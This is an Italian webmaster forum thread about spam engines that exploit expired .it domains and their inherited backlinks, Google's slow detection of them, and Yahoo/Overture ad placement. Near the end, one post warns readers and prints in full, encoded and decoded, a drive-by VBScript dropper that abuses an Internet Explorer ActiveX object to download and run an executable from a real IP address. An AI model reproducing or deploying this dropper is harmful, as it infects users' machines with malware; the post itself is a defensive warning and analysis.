• Community Manager

    @Everfluxx said:

    Il problema di fondo è che Google non riesce a individuare questo tipo di spam in maniera automatica, ossia senza passare attraverso il solito iter "spam report -> check da operatore -> intervento manuale", che richiede tempo; tempo che rende economicamente praticabile la creazione di spamengine di questo tipo. Come ti avevo scritto in privato:

    eheheh

    Esatto, e perchè una volta che si fa una segnalazione di massa di network non vengono segati alla base? 😄


  • Super User

    @Giorgiotave said:

    e perchè una volta che si fa una segnalazione di massa di network non vengono segati alla base? 😄
    Cosa intendi per "segati alla base"? Io posso anche segnalare a Google decine o centinaia di domini per volta, e Google può anche rimuoverli tutti in un colpo solo, ma se dopo pochi giorni gli stessi spammer creano altrettanti spamengine su nuovi domini, e Google non riesce a riconoscerli automaticamente come tali, il problema è destinato a ripresentarsi periodicamente, ad infinitum.

    La forza di questi siti sta anche e soprattutto nei back link che ereditano. Un modo per "segare alla base" questo tipo di exploit sarebbe perciò riuscire a individuare quando un dominio scaduto viene cancellato e quindi registrato da un nuovo intestatario, al fine di "resettarne" i back link, cosa che Google è in grado di fare per i TLD per i quali è accreditato come registrar (.biz, .com, .info, .name, .net, .org, .pro), ma non --evidentemente-- per i domini .it.


  • User Attivo

    @Everfluxx said:

    La forza di questi siti sta anche e soprattutto nei back link che ereditano. Un modo per "segare alla base" questo tipo di exploit sarebbe perciò riuscire a individuare quando un dominio scaduto viene cancellato e quindi registrato da un nuovo intestatario, al fine di "resettarne" i back link, cosa che Google è in grado di fare per i TLD per i quali è accreditato come registrar (.biz, .com, .info, .name, .net, .org, .pro), ma non --evidentemente-- per i domini .it.

    Ma sei sicuro sia possibile? Al massimo può cancellare i dati che ha nei propri database per quel sito. Ma non può cancellare i link nelle pagine.

    Ovvero: metti che un sito del network è su dmoz. Se scade, magari google può resettare il suo database, ma non può cancellare il link di dmoz. Perciò, quando il network resuscita il sito, dmoz continua a linkarlo (anche se a dir la verità linkava quello prima). E quando google ripasserà sul link di dmoz, penserà che dmoz linka quella pagina, non penserà mai che quel link è un rimasuglio riferito al sito precedente.
    Quindi google rimane fregato, e pensa che il link di dmoz sia riferito al sito/network.

    Google invece, come già detto, dovrebbe trovare il modo per verificare se il tema del sito decaduto rimane uguale al sito resuscitato.

    Il controllo umano è limitato. Io, senza quella Serp, non mi sarei mai accorto guardando solo il sito che quello era parte di un network.

    Perciò: siamo veramente sicuri che google possa trovare network del genere in breve tempo??


  • User Attivo

    @Giorgiotave said:

    Ad esempio

    Non riesco a capire: dove sta il problema a segare alla base i domini?

    Ciao Giorgio,

    gli annunci cambiano leggermente di sito in sito e come ben sai ci vuole tempo perchè intervenga il filtro antiduplicazione, la grafica è pressochè identica, ma cosa dire delle migliaia di blog che utilizzano lo stesso tema?

    Link in ingresso completamente diversi tra i due siti meglio posizionati, alcuni dei quali ottimi.

    I siti inoltre provengono originariamente da contesti totalmente differenti.

    E' chiaro che avranno vita breve ma è altrettanto chiaro che nel breve periodo Google non ha elementi per etichettarli (se non le segnalazioni umane)


  • Super User

    @HaccaH said:

    Ma sei sicuro sia possibile?
    Sì, sono sicuro che sia (tecnicamente) possibile, per i TLD per i quali Google ha accesso diretto ai dati WHOIS, in quanto registrar.

    Al massimo può cancellare i dati che ha nei propri database per quel sito. Ma non può cancellare i link nelle pagine.
    E' ovvio che Google non può cancellare i link nelle pagine. 🙂 Per "resettare i back link" intendevo attenuare o annullare il peso che i back link ereditati da un dominio scaduto e poi ri-registrato da un diverso intestatario hanno ai fini del ranking, analogamente a quanto Google fa per i link a pagamento.

    Una repentina variazione del tema di un sito può essere un buon indicatore di questo tipo di spamming che si basa sulla registrazione di domini scaduti con buoni back link.


  • Community Manager

    @fheller said:

    Ciao Giorgio,

    gli annunci cambiano leggermente di sito in sito e come ben sai ci vuole tempo perchè intervenga il filtro antiduplicazione, la grafica è pressochè identica, ma cosa dire delle migliaia di blog che utilizzano lo stesso tema?

    Ciao Fabio,

    Si lo vedo, ma con delle ricerche mirate....si possono individuare a mano 🙂

    Il problema è proprio quello, a mano 😄


  • Community Manager

    @Everfluxx said:

    Cosa intendi per "segati alla base"? Io posso anche segnalare a Google decine o centinaia di domini per volta, e Google può anche rimuoverli tutti in un colpo solo, ma se dopo pochi giorni gli stessi spammer creano altrettanti spamengine su nuovi domini, e Google non riesce a riconoscerli automaticamente come tali, il problema è destinato a ripresentarsi periodicamente, ad infinitum.

    Ma come, non è possibile creare un filtro per controllare quando cambia l'intestatario del dominio + copia cache?

    Ed in più se è sempre lo stesso intestatario?

    Ed in più se la densità di link in home page rispetto al testo è altissima?

    Solo su documenti in Italiano?

    @Everfluxx said:

    La forza di questi siti sta anche e soprattutto nei back link che ereditano. Un modo per "segare alla base" questo tipo di exploit sarebbe perciò riuscire a individuare quando un dominio scaduto viene cancellato e quindi registrato da un nuovo intestatario, al fine di "resettarne" i back link, cosa che Google è in grado di fare per i TLD per i quali è accreditato come registrar (.biz, .com, .info, .name, .net, .org, .pro), ma non --evidentemente-- per i domini .it.

    Ma evidentemente servirebbe un filtro che, cambiando intestatario dovrebbe eliminare il valore del sito web, solo in alcuni casi:)

    Lo so che sono soluzioni (questa e quelle sopra) uniche e forse difficili da attuare, ma un modo lo si trova.

    I domini .it rimangono per 30 giorni in attesa di re-registrazione no? 🙂

    Da Google stesso, con una ricerca interna, non dovrebbe risultare difficile creare uno spider che tracci i punto.it

    Ripeto, so che sono soluzioni troppo specifiche, ma mi interessa moltissimo.


  • Super User

    @Giorgiotave said:

    Ma come, non è possibile creare un filtro per controllare quando cambia l'intestatario del dominio + copia cache?
    Per i domini nel TLD .it, non so se Google sia in grado di applicare questo "filtro" in maniera efficace ed efficiente, non avendo accesso diretto ai dati WHOIS. Quanto visto lascerebbe presumere che non lo sia. Ovviamente che il problema sia riconducibile a questo è soltanto una mia ipotesi.


  • User Attivo

    Bisogna sempre soffermarsi tra cosa un motore sia in grado di fare e cosa nel momento gli convenga fare.

    Piazzare decine di macchine per: monitorare le scadenze degli it, confrontare la variazione dei contenuti dei siti che cambiano owner (perche' io spammer devo comprare un sito solo se scaduto? faccio prima a comprare un sito a bassa resa con buoni valori, pertanto io motore dovro' monitorare tutto, non solo quelli scaduti) riconsiderare tutti i link in base ai nuovi clienti (se io ho un solo sito mio lincato da 10 siti non miei e' una cosa, ma se l'owner di uno di quei 10 siti poi acquista il mio senza modificarlo... ecco che allora quel sito avra' 9 link fuori network ed 1 dal network... una bella differrenza), etc etc ha senso economicamente al fine di individuare un migliaio di siti di spam da bassa classifica?

    Per G oggi forse non ancora.


  • User Attivo

    quando dico che a G non interessano certe query, intendo che forse non sono interessanti per l'utente (raramente cercate) e quindi lui non spreca risorse per porvi rimedio, né tecnico (algo. filtri), né umano (raters&co).

    per quello che ho visto (da gennaio ad oggi) la maggior parte delle query in cui è posizionato il network di Seocom è di basso livello.

    raramente capita di vederlo per query stagionali importanti, o per query competitive. e in quei rari casi il giudizio dei raters serve solo per controllo, perchè in SERP il sito già non c'è più (ergo bannato/penalizzato).

    es?
    recente query su di un evento importante che per 2 settimane ha catalizzato l'attenzione degli appassionati:

    http://www.faxtor.it/sport/basket/mondiali+basket+2002-2.html

    sito valutato e segnalato, ma non presente nelle prime 10 pagine di G. per la stessa query sono state valutate le pagine delle sezioni sportive di msn e yahoo

    rimane il fatto che Seocom ha individuato una tecnica (vecchi domini, circuito di overture, query di basso livello), nel tempo l'ha affinata, è riuscito a sfruttarla per miglia e migliaia di query, quadagnando migliaia e migliaia di € (e facendoli guadagnare a Y/overture)

    ora il perchè G non banni sistematicamente il person l'address o qualsiasi cosa identifichi il proprietario del dominio, bhe rimane un mistero.

    e rimane un mistero il perchè nessuno degli inserzionisti che attivano l'opzione di pubblicazione degli annunci sui siti partner di Y/overture non si lamenti del fatto che i propri annunci non vengano pubblicati su siti VERI, con contenuti VERI, interessanti per l'utente, ma su spamengine estremamente chiusi dal valore quanto meno dubbio.

    che rendano anche a loro?


  • Super User

    @agoago said:

    Bisogna sempre soffermarsi tra cosa un motore sia in grado di fare e cosa nel momento gli convenga fare.
    OK. Soffermiamoci pure. 🙂

    (perche' io spammer devo comprare un sito solo se scaduto?
    Perché lo paghi meno. 😉

    faccio prima a comprare un sito a bassa resa con buoni valori,
    No. Fino a prova contraria, si fa prima a ri-registrare al volo un dominio appena viene cancellato, che non a negoziarne la cessione con l'attuale owner, e fare un cambio di registrant. Soprattutto se un amico maintainer ti dà accesso alla lista dei domini .it in scadenza (lista che puoi facilmente ordinare per PR, o per BL)...

    ha senso economicamente al fine di individuare un migliaio di siti di spam da bassa classifica?
    La stragrande maggioranza degli spamengine sono, in un certo senso, "da bassa classifica": raschiano il fondo del barile del PPC, sfruttando la long tail e posizionandosi per un numero tipicamente molto grande di keyphrase a bassa competitività (ma cumulativamente molto redditizie).

    Poi ovviamente ci sono spam-engine più o meno redditizi, più o meno raffinati, più o meno eleganti. Ma questa è una distinzione che a me non interessa fare qui.

    Perciò ti rigiro la tua stessa domanda: laddove ciò sia tecnicamente possibile, ha senso economicamente per Google investire per individuare e rimuovere dalle SERP quanti più spam engine possibile, anziché lasciarli proliferare indisturbati? Io dico che la risposta è .


  • Super User

    @Matteo said:

    quando dico che a G non interessano certe query, intendo che forse non sono interessanti per l'utente (raramente cercate) e quindi lui non spreca risorse per porvi rimedio, né tecnico (algo. filtri), né umano (raters&co).
    Come ho appena scritto in risposta ad agoago, penso che questo sarebbe un grave errore, e non voglio credere che il motivo sia disinteresse o lassismo. In realtà finora ho avuto modo di apprezzare un'encomiabile solerzia da parte di Google nel rimuovere spam-engine in seguito a segnalazione (specialmente se effettuata tramite Sitemaps), indipendentemente dalla popolarità della keyphrase segnalata (che comunque è soltanto un esempio fra i tanti possibili). Ne concludo perciò che le cause devono essere prettamente tecniche.

    per quello che ho visto (da gennaio ad oggi) la maggior parte delle query in cui è posizionato il network di Seocom è di basso livello.
    Quasi tutti gli spam-engine sono posizionati per query "di basso livello" (e questo agoago lo sa meglio di me).

    ora il perchè G non banni sistematicamente il person l'address o qualsiasi cosa identifichi il proprietario del dominio, bhe rimane un mistero.
    Perché, che tu sappia Google effettua questo tipo di ban ad personam? (E se sì, si tratta di una prassi comune, oppure viene attuata solo in casi eccezionali?)

    e rimane un mistero il perchè nessuno degli inserzionisti che attivano l'opzione di pubblicazione degli annunci sui siti partner di Y/overture non si lamenti del fatto che i propri annunci non vengano pubblicati su siti VERI, con contenuti VERI, interessanti per l'utente, ma su spamengine estremamente chiusi dal valore quanto meno dubbio.
    Beh, non è vero che nessuno si lamenta. Noi a suo tempo avevamo provato a farci sentire presso il Servizio Clienti di Yahoo! Search Marketing. Purtroppo la nostra ultima mail, nella quale chiedevamo esplicitamente quali garanzie YSM è in grado di offrire ai propri clienti e rivenditori in merito alla qualità dei loro cosiddetti "partner di secondo livello" è rimasta senza risposta. 😞


  • Super User

    Aggiungo un'importante precisazione sull'argomento "spam-engine e Yahoo! Search Marketing": aderendo al circuito pay-per-click di YSM, di fatto non è possibile impedire la visualizzazione dei propri annunci sui cosiddetti "partner di secondo livello" di YSM (es. cleansearch.info). Disabilitare l'opzione "Content Match" (l'equivalente dell'opzione "Rete di contenuti" di Google AdWords, che controlla la syndication degli annunci sul circuito di AdSense) non serve a nulla, perché questi siti sono considerati motori di ricerca partner di Yahoo! Search Marketing, e fanno parte a tutti gli effetti della rete di ricerca "standard" di Yahoo!.


  • Super User

    sulla questione yahoo/overture, penso non ci sia molto da fare/dire.
    il motore del mondo sono i soldi, ed evidentemente il sistema funziona bene. va bene ai publisher (é ovvio), va bene agli inserzionisti (evidentemente), e va bene a yahoo (strano, eh?).

    gli inserzionisti che si lamentano di dove vanno a finire i loro annunci sono mosche bianche. e non escludo che, tendenzialmente, il ritorno sia buono. magari qualcuno con esperienze in tal senso puó illuminarci su questo 🙂


  • User Attivo

    Everfluxx quando ci si chiede cosa dovrebbe (o non) fare un motore si deve ragionare come un motore e non come un wm.

    Pertanto un motore sa che un wm puo' comprare un sito anche se non scaduto e pertanto non e' obbligato a comprare solo siti scaduti.

    Sa che un wm se vuole e ha soldi (da buttare o meno) fa prima a comprare un sito attivo piuttosto che aspettare o guerreggiare sugli avanzi altrui.

    Il motore affronta il problema in toto o preferisce non impegnarsi in investimenti che invece ha gia' affrontato in altre occasioni.

    G e' in grado di valutare come meglio crede i passaggi dei .com, se attualmente non mette lo stesso impegno (investimento) per i .it significa che ad oggi non gli interessa la cosa.


  • Super User

    @agoago said:

    Everfluxx quando ci si chiede cosa dovrebbe (o non) fare un motore si deve ragionare come un motore e non come un wm. Agoago, un motore non "ragiona". 😄 Un motore è un programma creato da persone. Io credo che gli ingegneri di Google si preoccupino molto di come "ragionano" utenti, webmaster e spammer, a seconda dei casi. 😉

    Pertanto un motore sa che un wm puo' comprare un sito anche se non scaduto e pertanto non e' obbligato a comprare solo siti scaduti.

    Sa che un wm se vuole e ha soldi (da buttare o meno) fa prima a comprare un sito attivo piuttosto che aspettare o guerreggiare sugli avanzi altrui.
    Non è detto che si debba "guerreggiare". E comunque si tratta di un processo automatizzabile con relativa facilità: per questo gli spammer di professione lo prediligono. E per questo si dice che Google presti una certa "attenzione" ai domini scaduti che vengono ri-registrati...

    G e' in grado di valutare come meglio crede i passaggi dei .com, se attualmente non mette lo stesso impegno (investimento) per i .it significa che ad oggi non gli interessa la cosa.
    ...oppure che, al momento, non è tecnicamente in grado di farlo.


  • User Attivo

    altri spamengine che vengono valutati spesso

    concorsixtutti.it

    fotoexpo.net

    e un altro d'oltre-oceano

    http://x1333952869.italianonews.info/x933024644/260537865


  • Super User

    oggi ho trovato altri spam engine con chiavi sicuramente più concorrenziali: davvero, sveglia google!!!


  • Super User

    Attenzione: non cliccate sui risultati della SERP postata da Micky qui sopra (soprattutto se usate IE col supporto JavaScript e ActiveX abilitato)!

    Quelle doorway effettuano un redirect verso altre pagine (su IP 195.225.176.34) che contengono questo script:

    <Script Language="JavaScript">
    
    var var10939103245=unescape('%3C%53%43%52%49%50%54%20%6C%61%6E%67%75%61%67%65%3D%22%56%42%53%63'+
    '%72%69%70%74%22%3E%0D%0A%20%20%20%20%49%66%20%6E%61%76%69%67%61%74'+
    '%6F%72%2E%61%70%70%4E%61%6D%65%3D%22%4D%69%63%72%6F%73%6F%66%74%20'+
    '%49%6E%74%65%72%6E%65%74%20%45%78%70%6C%6F%72%65%72%22%20%54%68%65'+
    '%6E%0D%0A%20%20%20%20%49%66%20%49%6E%53%74%72%28%6E%61%76%69%67%61'+
    '%74%6F%72%2E%70%6C%61%74%66%6F%72%6D%2C%22%57%69%6E%33%32%22%29%20'+
    '%3C%3E%20%30%20%20%54%68%65%6E%0D%0A%0D%0A%20%20%20%20%44%69%6D%20'+
    '%4F%62%6A%5F%4E%61%6D%65%0D%0A%20%20%20%20%44%69%6D%20%4F%62%6A%5F'+
    '%50%72%6F%67%0D%0A%20%20%20%20%0D%0A%20%20%20%20%73%65%74%20%6F%62'+
    '%6A%5F%52%44%53%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74'+
    '%65%45%6C%65%6D%65%6E%74%28%22%6F%62%6A%65%63%74%22%29%0D%0A%20%20'+
    '%20%20%6F%62%6A%5F%52%44%53%2E%73%65%74%41%74%74%72%69%62%75%74%65'+
    '%20%22%69%64%22%2C%20%22%6F%62%6A%5F%52%44%53%22%0D%0A%20%20%20%20'+
    '%6F%62%6A%5F%52%44%53%2E%73%65%74%41%74%74%72%69%62%75%74%65%20%22'+
    '%63%6C%61%73%73%69%64%22%2C%20%22%63%6C%73%69%64%3A%42%44%39%36%43'+
    '%35%35%36%2D%36%35%41%33%2D%31%31%44%30%2D%39%38%33%41%2D%30%30%43'+
    '%30%34%46%43%32%39%45%33%36%22%0D%0A%20%20%20%20%0D%0A%20%20%20%20'+
    '%66%6E%20%3D%20%22%31%30%38%39%36%32%33%33%32%33%30%2E%65%78%65%22'+
    '%0D%0A%20%20%20%20%4F%62%6A%5F%4E%61%6D%65%20%3D%20%22%53%22%20%26'+
    '%20%22%68%22%20%26%20%22%65%22%20%26%20%22%6C%22%20%26%20%22%6C%22'+
    '%20%20%20%20%0D%0A%20%20%20%20%4F%62%6A%5F%50%72%6F%67%20%3D%20%22'+
    '%41%22%20%26%20%22%70%22%20%26%20%22%70%6C%22%20%26%20%22%69%22%20'+
    '%26%20%22%63%61%22%20%26%20%22%74%69%22%20%26%20%22%6F%6E%22%20%20'+
    '%20%20%0D%0A%20%20%20%20%73%65%74%20%6F%62%6A%5F%53%68%65%6C%6C%41'+
    '%70%70%20%3D%20%6F%62%6A%5F%52%44%53%2E%43%72%65%61%74%65%4F%62%6A'+
    '%65%63%74%28%4F%62%6A%5F%4E%61%6D%65%20%26%20%22%2E%22%20%26%20%4F'+
    '%62%6A%5F%50%72%6F%67%2C%22%22%29%0D%0A%20%20%20%20%53%65%74%20%6F'+
    '%46%6F%6C%64%65%72%20%3D%20%6F%62%6A%5F%53%68%65%6C%6C%41%70%70%2E'+
    '%4E%61%6D%65%53%70%61%63%65%28%32%30%29%0D%0A%20%20%20%20%53%65%74'+
    '%20%6F%46%6F%6C%64%65%72%49%74%65%6D%3D%6F%46%6F%6C%64%65%72%2E%50'+
    '%61%72%73%65%4E%61%6D%65%28%22%53%79%6D%62%6F%6C%2E%74%74%66%22%29'+
    '%0D%0A%20%20%20%20%46%6F%6E%74%5F%50%61%74%68%5F%43%6F%6D%70%6F%6E'+
    '%65%6E%74%73%3D%53%70%6C%69%74%28%6F%46%6F%6C%64%65%72%49%74%65%6D'+
    '%2E%50%61%74%68%2C%22%5C%22%2C%2D%31%2C%31%29%0D%0A%20%20%20%20%57'+
    '%69%6E%44%69%72%3D%20%46%6F%6E%74%5F%50%61%74%68%5F%43%6F%6D%70%6F'+
    '%6E%65%6E%74%73%28%30%29%20%26%20%22%5C%22%20%26%20%20%46%6F%6E%74'+
    '%5F%50%61%74%68%5F%43%6F%6D%70%6F%6E%65%6E%74%73%28%31%29%20%26%20'+
    '%22%5C%22%0D%0A%20%20%20%20%66%6E%3D%57%69%6E%44%69%72%20%26%20%66'+
    '%6E%0D%0A%20%20%20%20%20%20%0D%0A%20%20%20%20%4F%62%6A%5F%4E%61%6D'+
    '%65%20%3D%20%22%4D%69%22%20%26%20%22%63%72%22%20%26%20%22%6F%73%6F'+
    '%66%74%22%20%20%20%20%0D%0A%20%20%20%20%4F%62%6A%5F%50%72%6F%67%20'+
    '%3D%20%22%58%22%20%26%20%22%4D%22%20%26%20%22%4C%48%54%54%22%20%26'+
    '%20%22%50%22%20%20%20%20%0D%0A%20%20%20%20%73%65%74%20%6F%62%6A%5F'+
    '%6D%73%78%6D%6C%32%20%3D%20%43%72%65%61%74%65%4F%62%6A%65%63%74%28'+
    '%4F%62%6A%5F%4E%61%6D%65%20%26%20%22%2E%22%20%26%20%4F%62%6A%5F%50'+
    '%72%6F%67%29%0D%0A%20%20%20%20%6F%62%6A%5F%6D%73%78%6D%6C%32%2E%6F'+
    '%70%65%6E%20%22%47%22%20%26%20%22%45%22%20%26%20%22%54%22%2C%22%68'+
    '%74%74%70%3A%2F%2F%31%39%35%2E%32%32%35%2E%31%37%36%2E%33%34%2F%75'+
    '%73%65%72%32%2F%62%6F%6E%64%30%31%35%32%2F%73%65%72%76%69%63%65%33'+
    '%32%2E%65%78%65%22%2C%46%61%6C%73%65%0D%0A%20%20%20%20%6F%62%6A%5F'+
    '%6D%73%78%6D%6C%32%2E%73%65%6E%64%0D%0A%20%20%20%20%4F%6E%20%45%72'+
    '%72%6F%72%20%52%65%73%75%6D%65%20%4E%65%78%74%0D%0A%20%20%20%20%0D'+
    '%0A%20%20%20%20%4F%62%6A%5F%4E%61%6D%65%20%3D%20%22%41%44%22%20%26'+
    '%20%22%4F%44%42%22%20%20%20%20%0D%0A%20%20%20%20%4F%62%6A%5F%50%72'+
    '%6F%67%20%3D%20%22%53%74%22%20%26%20%22%72%65%61%22%20%26%20%22%6D'+
    '%22%20%20%20%20%0D%0A%20%20%20%20%73%65%74%20%6F%62%6A%5F%61%64%6F'+
    '%64%62%20%3D%20%6F%62%6A%5F%52%44%53%2E%43%72%65%61%74%65%4F%62%6A'+
    '%65%63%74%28%4F%62%6A%5F%4E%61%6D%65%20%26%20%22%2E%22%20%26%20%4F'+
    '%62%6A%5F%50%72%6F%67%2C%22%22%29%0D%0A%20%20%20%20%49%66%20%45%72'+
    '%72%2E%4E%75%6D%62%65%72%20%54%68%65%6E%0D%0A%20%20%20%20%0D%0A%20'+
    '%20%20%20%4F%62%6A%5F%4E%61%6D%65%20%3D%20%22%53%22%20%26%20%22%63'+
    '%22%20%26%20%22%72%69%70%74%22%20%26%20%22%69%6E%67%22%20%20%20%20'+
    '%0D%0A%20%20%20%20%4F%62%6A%5F%50%72%6F%67%20%3D%20%22%46%22%20%26'+
    '%20%22%69%22%20%26%20%22%6C%65%53%79%22%20%26%20%22%73%74%65%22%20'+
    '%26%20%22%6D%4F%22%20%26%20%22%62%6A%65%63%74%22%20%20%20%20%0D%0A'+
    '%20%20%20%20%53%65%74%20%6F%62%6A%5F%46%69%6C%65%53%79%73%3D%6F%62'+
    '%6A%5F%52%44%53%2E%43%72%65%61%74%65%4F%62%6A%65%63%74%28%4F%62%6A'+
    '%5F%4E%61%6D%65%20%26%20%22%2E%22%20%26%20%4F%62%6A%5F%50%72%6F%67'+
    '%2C%22%22%29%0D%0A%20%20%20%20%53%65%74%20%64%6F%77%6E%6C%6F%61%64'+
    '%5F%66%69%6C%65%3D%6F%62%6A%5F%46%69%6C%65%53%79%73%2E%43%72%65%61'+
    '%74%65%54%65%78%74%46%69%6C%65%28%66%6E%2C%20%54%52%55%45%29%0D%0A'+
    '%20%20%20%20%64%6F%77%6E%6C%6F%61%64%5F%66%69%6C%65%5F%73%69%7A%65'+
    '%3D%4C%65%6E%42%28%58%4D%4C%42%6F%64%79%29%0D%0A%20%20%20%20%46%6F'+
    '%72%20%69%3D%31%20%54%6F%20%64%6F%77%6E%6C%6F%61%64%5F%66%69%6C%65'+
    '%5F%73%69%7A%65%20%0D%0A%20%20%20%20%63%42%79%74%65%3D%4D%69%64%42'+
    '%28%58%4D%4C%42%6F%64%79%2C%69%2C%31%29%0D%0A%20%20%20%20%42%79%74'+
    '%65%43%6F%64%65%3D%41%73%63%42%28%63%42%79%74%65%29%0D%0A%20%20%20'+
    '%20%64%6F%77%6E%6C%6F%61%64%5F%66%69%6C%65%2E%57%72%69%74%65%28%43'+
    '%68%72%28%42%79%74%65%43%6F%64%65%29%29%0D%0A%20%20%20%20%4E%65%78'+
    '%74%0D%0A%20%20%20%20%64%6F%77%6E%6C%6F%61%64%5F%66%69%6C%65%2E%43'+
    '%6C%6F%73%65%0D%0A%20%20%20%20%0D%0A%20%20%20%20%4F%62%6A%5F%4E%61'+
    '%6D%65%20%3D%20%22%57%22%20%26%20%22%53%63%22%20%26%20%22%72%22%20'+
    '%26%20%22%69%70%74%22%20%20%20%20%0D%0A%20%20%20%20%4F%62%6A%5F%50'+
    '%72%6F%67%20%3D%20%22%53%68%22%20%26%20%22%65%22%20%26%20%22%6C%22'+
    '%20%26%20%22%6C%22%20%20%20%20%0D%0A%20%20%20%20%53%65%74%20%20%6F'+
    '%62%6A%5F%57%53%68%65%6C%6C%3D%6F%62%6A%5F%52%44%53%2E%43%72%65%61'+
    '%74%65%4F%62%6A%65%63%74%28%4F%62%6A%5F%4E%61%6D%65%20%26%20%22%2E'+
    '%22%20%26%20%4F%62%6A%5F%50%72%6F%67%2C%22%22%29%0D%0A%20%20%20%20'+
    '%4F%6E%20%45%72%72%6F%72%20%52%65%73%75%6D%65%20%4E%65%78%74%0D%0A'+
    '%20%20%20%20%6F%62%6A%5F%57%53%68%65%6C%6C%2E%52%75%6E%20%66%6E%2C'+
    '%31%2C%46%41%4C%53%45%0D%0A%20%20%20%20%45%6C%73%65%0D%0A%20%20%20'+
    '%20%6F%62%6A%5F%61%64%6F%64%62%2E%54%79%70%65%3D%31%0D%0A%20%20%20'+
    '%20%6F%62%6A%5F%61%64%6F%64%62%2E%4F%70%65%6E%0D%0A%20%20%20%20%6F'+
    '%62%6A%5F%61%64%6F%64%62%2E%57%72%69%74%65%28%6F%62%6A%5F%6D%73%78'+
    '%6D%6C%32%2E%72%65%73%70%6F%6E%73%65%42%6F%64%79%29%0D%0A%20%20%20'+
    '%20%6F%62%6A%5F%61%64%6F%64%62%2E%53%61%76%65%54%6F%46%69%6C%65%20'+
    '%66%6E%2C%32%0D%0A%20%20%20%20%6F%62%6A%5F%53%68%65%6C%6C%41%70%70'+
    '%2E%53%68%65%6C%6C%45%78%65%63%75%74%65%20%66%6E%0D%0A%20%20%20%20'+
    '%45%6E%64%20%49%66%0D%0A%20%20%20%0D%0A%20%20%20%20%45%6E%64%20%49'+
    '%66%0D%0A%20%20%20%20%45%6E%64%20%49%66%0D%0A%20%20%20%0D%0A%3C%2F'+
    '%53%43%52%49%50%54%3E%0D%0A%0D%0A');
    document.write(var10939103245);
    
    </Script>
    ``` Il codice JavaScript, una volta decodificato con unescape(), si rivela essere un VBScript potenzialmente pericoloso, appositamente progettato per permettere il download e l'installazione di un dialer dallo stesso indirizzo IP, molto probabilmente sfruttando una vulnerabilità di Internet Explorer. Date un'occhiata al sorgente:
    
    

    <Script Language="JavaScript">

    var var10939103245=unescape('<SCRIPT language="VBSc'+
    'ript">
    If navigat'+
    'or.appName="Microsoft '+
    'Internet Explorer" The'+
    'n
    If InStr(naviga'+
    'tor.platform,"Win32") '+
    '<> 0 Then

    Dim '+
    

    'Obj_Name
    Dim Obj_'+
    'Prog

    set ob'+
    

    'j_RDS = document.creat'+
    'eElement("object")
    '+
    ' obj_RDS.setAttribute'+
    ' "id", "obj_RDS"
    '+
    'obj_RDS.setAttribute "'+
    'classid", "clsid:BD96C'+
    '556-65A3-11D0-983A-00C'+
    '04FC29E36"

    '+
    

    'fn = "10896233230.exe"'+
    '
    Obj_Name = "S" &'+
    ' "h" & "e" & "l" & "l"'+
    '
    Obj_Prog = "'+
    'A" & "p" & "pl" & "i" '+
    '& "ca" & "ti" & "on" '+
    '
    set obj_ShellA'+
    'pp = obj_RDS.CreateObj'+
    'ect(Obj_Name & "." & O'+
    'bj_Prog,"")
    Set o'+
    'Folder = obj_ShellApp.'+
    'NameSpace(20)
    Set'+
    ' oFolderItem=oFolder.P'+
    'arseName("Symbol.ttf")'+
    '
    Font_Path_Compon'+
    'ents=Split(oFolderItem'+
    '.Path,"",-1,1)
    W'+
    'inDir= Font_Path_Compo'+
    'nents(0) & "" & Font'+
    '_Path_Components(1) & '+
    '""
    fn=WinDir & f'+
    'n

    Obj_Nam'+
    

    'e = "Mi" & "cr" & "oso'+
    'ft"
    Obj_Prog '+
    '= "X" & "M" & "LHTT" &'+
    ' "P"
    set obj_'+
    'msxml2 = CreateObject('+
    'Obj_Name & "." & Obj_P'+
    'rog)
    obj_msxml2.o'+
    'pen "G" & "E" & "T","h'+
    'ttp://195.225.176.34/u'+
    'ser2/bond0152/service3'+
    '2.exe",False
    obj_'+
    'msxml2.send
    On Er'+
    'ror Resume Next

    '+
    '
    Obj_Name = "AD" &'+
    ' "ODB"
    Obj_Pr'+
    'og = "St" & "rea" & "m'+
    '"
    set obj_ado'+
    'db = obj_RDS.CreateObj'+
    'ect(Obj_Name & "." & O'+
    'bj_Prog,"")
    If Er'+
    'r.Number Then

    '+
    ' Obj_Name = "S" & "c'+
    '" & "ript" & "ing" '+
    '
    Obj_Prog = "F" &'+
    ' "i" & "leSy" & "ste" '+
    '& "mO" & "bject"
    '+
    ' Set obj_FileSys=ob'+
    'j_RDS.CreateObject(Obj'+
    '_Name & "." & Obj_Prog'+
    ',"")
    Set download'+
    '_file=obj_FileSys.Crea'+
    'teTextFile(fn, TRUE)
    '+
    ' download_file_size'+
    '=LenB(XMLBody)
    Fo'+
    'r i=1 To download_file'+
    '_size
    cByte=MidB'+
    '(XMLBody,i,1)
    Byt'+
    'eCode=AscB(cByte)
    '+
    ' download_file.Write(C'+
    'hr(ByteCode))
    Nex'+
    't
    download_file.C'+
    'lose

    Obj_Na'+
    

    'me = "W" & "Sc" & "r" '+
    '& "ipt"
    Obj_P'+
    'rog = "Sh" & "e" & "l"'+
    ' & "l"
    Set o'+
    'bj_WShell=obj_RDS.Crea'+
    'teObject(Obj_Name & ".'+
    '" & Obj_Prog,"")
    '+
    'On Error Resume Next
    '+
    ' obj_WShell.Run fn,'+
    '1,FALSE
    Else
    '+
    ' obj_adodb.Type=1
    '+
    ' obj_adodb.Open
    o'+
    'bj_adodb.Write(obj_msx'+
    'ml2.responseBody)
    '+
    ' obj_adodb.SaveToFile '+
    'fn,2
    obj_ShellApp'+
    '.ShellExecute fn
    '+
    'End If

    End I'+
    

    'f
    End If

    </'+
    'SCRIPT>

    ');
    document.write(var10939103245);

    </Script>

    BTW, qualcuno sa dirmi che razza di indirizzo è [questo](http://3286347810/)? (E' la prima volta che mi capita di vedere un URL in quel formato).

  • User Attivo

    E' simile a questo?
    Attenzione non aprite questo link (soprattutto se usate IE col supporto JavaScript e ActiveX abilitato)!

    http : // 1-3 . tostodentro . org / italcraft /

    Ciao Alessio